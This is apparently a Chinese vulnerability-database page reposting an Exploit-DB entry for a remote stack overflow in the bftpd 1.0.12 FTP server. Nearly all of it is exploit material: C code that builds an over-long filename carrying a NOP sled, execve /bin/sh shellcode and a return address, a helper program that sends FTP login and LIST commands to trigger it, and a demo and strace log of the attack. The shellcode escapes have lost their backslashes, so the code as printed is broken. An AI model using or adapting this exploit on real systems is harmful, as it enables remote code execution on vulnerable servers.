BFTPd 1.0.12 – Remote Overflow

漏洞ID	1053501	漏洞类型
发布时间	2000-12-11	更新时间	2000-12-11
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/225

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*                                                                                                                                             
  Creates a filname to exploit the bug in bftpd 1.0.12                                                                                           
  Create the file, cwd in the shell directory and nlist the file directory.  

  Coded by korty <[email protected]>
*/

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <fcntl.h>


#define LEN 205

int main (int argc, char **argv)
{
  char buf[LEN + 12];
  int  ret = 0xbffffa80;
  int  *p;
  int  fp;
  
  char code[]=

 /*
  *  Linux/x86
  *
  *  toupper() evasion, standard execve() /bin/sh (used eg. in various
  *  imapd exploits). Goes through a loop adding 0x20 to the 
  *  (/bin/sh -= 0x20) string (ie. yields /bin/sh after addition).
  */

  /* main: */
  "xebx29"                            /* jmp callz                   */
  /* start: */
  "x5e"                                /* popl %esi                   */
  "x29xc9"                            /* subl %ecx, %ecx             */
  "x89xf3"                            /* movl %esi, %ebx             */
  "x89x5ex08"                        /* movl %ebx, 0x08(%esi)       */
  "xb1x07"                            /* movb $0x07, %cl             */
  /* loopz: */
  "x80x03x20"                        /* addb $0x20, (%ebx)          */
  "x43"                                /* incl %ebx                   */
  "xe0xfa"                            /* loopne loopz                */
  "x29xc0"                            /* subl %eax, %eax             */
  "x88x46x07"                        /* movb %al, 0x07(%esi)        */
  "x89x46x0c"                        /* movl %eax, 0x0c(%esi)       */
  "xb0x0b"                            /* movb $0x0b, %al             */
  "x87xf3"                            /* xchgl %esi, %ebx            */
  "x8dx4bx08"                        /* leal 0x08(%ebx), %ecx       */
  "x8dx53x0c"                        /* leal 0x0c(%ebx), %edx       */
  "xcdx80"                            /* int $0x80                   */
  "x29xc0"                            /* subl %eax, %eax             */
  "x40"                                /* incl %eax                   */
  "xcdx80"                            /* int $0x80                   */
  /* callz: */
  "xe8xd2xffxffxff"                /* call start                  */
  "x0fx42x49x4ex0fx53x48";       /* /bin/sh -= 0x20             */



  if (argc > 1) {
    ret += atoi(argv[1]);
    fprintf(stderr, "Using ret %#010xn", ret);
  }

  memset(buf, 'x90', LEN);
  memcpy(buf + LEN - strlen(code), code, strlen(code));

  p = (int *) (buf + LEN);

  *p++ = ret;
  *p++ = ret;
  *p   = 0;

  fp = open(buf, O_CREAT);
  if(fp < 0) perror("buf");
  close(fp);

}
/*

-- BEGIN list.c --


#include <stdio.h>

int main()

{

#define USER "cb"
#define PASS "PasSwoRd"
#define PORT "port 127,0,0,1,4,4"  // Data on the port 1028 with the addr 127.0.0.1
#define CWD "cwd longfile"
#define LIST "list"

printf("user %sn", USER);
sleep(1);
printf("pass %sn", PASS);
sleep(1);
printf("%sn", PORT);
sleep(1);
printf("%sn", CWD);
sleep(1);
printf("%sn", LIST);

}


-- END list.c --







  A)  DEMO  


tshaw:~/longfile$ gcc -o exploit exploit.c 
tshaw:~/longfile$ ls
exploit*  exploit.c  list.c
tshaw:~/longfile$ ls
exploit*  exploit.c  list.c
tshaw:~/longfile$ ./exploit 
tshaw:~/longfile$ ls
exploit*
exploit.c
list.c
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220313)^)311211323211^b221a20003 C
300332)300210Fa211Ff220v203323211Kb211Sf311200)300@311200310322333
33333313BIN13SH200332333233200332333233*
tshaw:~/longfile$ 

tshaw:~/longfile$ gcc -o list list.c

tshaw:~/longfile$ nc -l -p 1028 &
[1] 29973
tshaw:~/longfile$ 


tshaw:~/longfile$ (./list ; cat) | nc localhost 21
220 bftpd 1.0.12 at 127.0.0.1 ready.
331 Password please.
230 User logged in.
200 PORT 127.0.0.1:1028 OK
250 OK

150 Data connection established.
drwxr-xr-x   2 1000     100          4096 Dec  8 04:06 .
drwxr-xr-x  55 1000     100          4096 Dec  8 04:02 ..
-rw-r--r--   1 1000     100           323 Dec  8 04:06 list.c
-rwxr-xr-x   1 1000     100         11931 Dec  8 04:06 list
-rw-r--r--   1 1000     100          2178 Dec  8 03:54 exploit.c
-rwxr-xr-x   1 1000     100         12861 Dec  8 03:56 exploit
-r-xr--r--   1 1000     100             0 Dec  8 03:56 릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱?^)??? C猩)핂F덯
                                                                 ?
                                                                  뉡뜊S
                                                                       ?)??脘BINSH????

[1]+  Done                    nc -l -p 1028
tshaw:~/longfile$ 



   B)  STRACE OUTPUT


tshaw:~# ps -aef |grep bftpd

cb       30128    62  0 Dec04 ?        00:00:00 bftpd
root     30136 30024  0 Dec04 ttyqa    00:00:00 grep bftpd

tshaw:~# strace -p 30128

read(0, "n", 4096)                     = 1
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4
setsockopt(4, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(4, SOL_SOCKET, SO_SNDBUF, [65536], 4) = 0
bind(4, {sin_family=AF_INET, sin_port=htons(0), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0
connect(4, {sin_family=AF_INET, sin_port=htons(1028), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0
write(2, "150 Data connection established."..., 34) = 34
open("/dev/null", O_RDONLY|O_NONBLOCK|0x10000) = -1 ENOENT (No such file or directory)
stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
open(".", O_RDONLY|O_NONBLOCK|0x10000)  = 5
fstat(5, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
fcntl(5, F_SETFD, FD_CLOEXEC)           = 0
brk(0x8052000)                          = 0x8052000
getdents(5, /* 7 entries */, 3933)      = 328
stat("./.", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
send(4, "drwxr-xr-x   2 1000     100     "..., 58, 0) = 58
stat("./..", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
send(4, "drwxr-xr-x  55 1000     100     "..., 59, 0) = 59
stat("./list.c", {st_mode=S_IFREG|0644, st_size=323, ...}) = 0
send(4, "-rw-r--r--   1 1000     100     "..., 63, 0) = 63
stat("./list", {st_mode=S_IFREG|0755, st_size=11931, ...}) = 0
send(4, "-rwxr-xr-x   1 1000     100     "..., 61, 0) = 61
stat("./exploit.c", {st_mode=S_IFREG|0644, st_size=2178, ...}) = 0
send(4, "-rw-r--r--   1 1000     100     "..., 66, 0) = 66
stat("./exploit", {st_mode=S_IFREG|0755, st_size=12861, ...}) = 0
send(4, "-rwxr-xr-x   1 1000     100     "..., 64, 0) = 64
stat("./릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱먮)^)??? C猩)핂F덯
                  ?
                   뉡뜊S
                        ?)??脘BINSH????, {st_mode=S_IFREG|S_ISUID|0544, st_size=0, ...}) = 0
send(4, "-r-xr--r--   1 1000     100     "..., 270, 0) = 270
execve("/bin/sh", ["/bin/sh"], [/* 0 vars */]) = -1 ENOENT (No such file or directory)
_exit(-1073743151)                      = ?

tshaw:~# 

*/


// milw0rm.com [2000-12-11]

相关推荐: Sybergen Sygate Denial of Service Vulnerability

Sybergen Sygate Denial of Service Vulnerability 漏洞ID 1104009 漏洞类型 Unknown 发布时间 2000-06-30 更新时间 2000-06-30 CVE编号 N/A CNNVD-ID N/A 漏…

文章版权归作者所有，未经允许请勿转载。

THE END